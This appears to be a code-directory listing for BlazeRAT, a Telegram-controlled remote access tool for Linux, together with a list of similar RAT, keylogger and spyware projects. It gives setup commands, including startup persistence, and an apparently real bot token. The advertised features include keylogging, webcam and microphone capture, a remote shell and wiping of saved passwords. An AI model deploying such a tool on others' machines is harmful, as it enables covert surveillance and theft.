All Projects → LimerBoy → Blazerat

LimerBoy / Blazerat

Licence: apache-2.0
🔥 Control your Linux home computer with telegram bot.

Programming Languages

python
139335 projects - #7 most used programming language
shell
77523 projects

Projects that are alternatives of or similar to Blazerat

ToxicEye
👽 Program for remote control of windows computers via telegram bot. Written in C#
Stars: ✭ 305 (+408.33%)
Mutual labels:  microphone, rat, keylogger, webcam
Inferno
🔥 Modern command line tool for malware creation on Windows
Stars: ✭ 105 (+75%)
Mutual labels:  webcam, microphone, screenshot, keylogger
PyIris
PyIris is a modular remote access trojan toolkit written in python targeting Windows and Linux systems.
Stars: ✭ 296 (+393.33%)
Mutual labels:  rat, keylogger
simple-tasks
App to enable/disable microphone/webcam by (de)activating the correspondent modules
Stars: ✭ 16 (-73.33%)
Mutual labels:  microphone, webcam
Videojs Record
video.js plugin for recording audio/video/image files
Stars: ✭ 1,074 (+1690%)
Mutual labels:  webcam, microphone
Instacam
Instant canvas video
Stars: ✭ 106 (+76.67%)
Mutual labels:  webcam, microphone
Telegram Rat
Windows Remote Administration Tool via Telegram. Written in Python
Stars: ✭ 201 (+235%)
Mutual labels:  webcam, rat
Backdoor
A backdoor that runs on Linux and Windows
Stars: ✭ 36 (-40%)
Mutual labels:  screenshot, webcam
KeyPlexer
Capstone: Keylogger Trojan
Stars: ✭ 32 (-46.67%)
Mutual labels:  screenshot, keylogger
Paradoxiarat
ParadoxiaRat : Native Windows Remote access Tool.
Stars: ✭ 395 (+558.33%)
Mutual labels:  rat, keylogger
Torat
ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication
Stars: ✭ 415 (+591.67%)
Mutual labels:  rat, keylogger
Saint
👁 (s)AINT is a Spyware Generator for Windows systems written in Java. [Discontinued]
Stars: ✭ 522 (+770%)
Mutual labels:  screenshot, keylogger
Blackworm
Black Worm Offical Repo
Stars: ✭ 80 (+33.33%)
Mutual labels:  screenshot, rat
Teardroid-phprat
🇮🇳 🤖 It's easy to use android botnet work without port forwarding, vps and android studio
Stars: ✭ 417 (+595%)
Mutual labels:  rat, keylogger
Stitch
Python Remote Administration Tool (RAT)
Stars: ✭ 2,018 (+3263.33%)
Mutual labels:  rat, keylogger
Rat Hodin V2.9
Remote Administration Tool for Linux
Stars: ✭ 97 (+61.67%)
Mutual labels:  rat, keylogger
Tinkerershell
A simple python reverse shell written just for fun.
Stars: ✭ 62 (+3.33%)
Mutual labels:  rat, keylogger
paradoxiaRAT
ParadoxiaRat : Native Windows Remote access Tool.
Stars: ✭ 583 (+871.67%)
Mutual labels:  rat, keylogger
Rat Via Telegram
Windows Remote Administration Tool via Telegram
Stars: ✭ 453 (+655%)
Mutual labels:  rat, keylogger
Skyrat
SkyRAT - Powershell Remote Administration Tool
Stars: ✭ 21 (-65%)
Mutual labels:  rat, keylogger


🔥 Control your 🐧 Linux home computer with telegram bot.
Tested on Ubuntu and Manjaro.

🚧 Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.

💻 Video:

F

🌿 Functions:

  • [x] Desktop Screenshot
  • [x] Webcam Screenshot/Video
  • [x] Microphone Recorder
  • [x] Keylogger
  • [x] Geolocation based on IP/BSSID
  • [x] Filemanager
  • [x] Taskmanager
  • [x] Remote Shell
  • [x] Remote keyboard
  • [x] Power control (shutdown, restart, suspend, logoff)
  • [x] Volume control
  • [x] Wipe user data (browsers history, passwords, cookies...)
  • [x] Rights management using authorization tokens

🔨 Installation:

  • Arch based: sudo pacman -S python3 python3-pip amixer portaudio xdotool --noconfirm
  • Debian based: sudo apt install python3 python3-pip amixer portaudio xdotool -y
git clone https://github.com/LimerBoy/BlazeRAT
cd BlazeRAT/BlazeRAT/
pip3 install --user -r requirements.txt

⚙️ Initialization:

  1. You need to save your telegram bot token
python3 main.py --InitApiToken 1393978203:AAEIdXztREV2D1KEx3ggvuOn2gSS12bPDLc
  1. Now you need to create a token by which you will log in to the bot.
    🔔 Token with full access:
    python3 main.py --TokenCreate --name root --perms "*"
    ... Created new token '681fb124-9009-4a9b-964d-030c55c274b7', with permissions: *
    
    🔕 Limited access token:
    python3 main.py --TokenCreate --name observer --perms SCREENSHOT WEBCAMERA KEYLOGGER LOCATION
    ... Created new token '52eff873-9c14-4c2b-8729-b2c6367925b7', with permissions: SCREENSHOT, WEBCAMERA, KEYLOGGER, LOCATION
    
  2. Add to startup
python3 main.py --InstallAgent
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].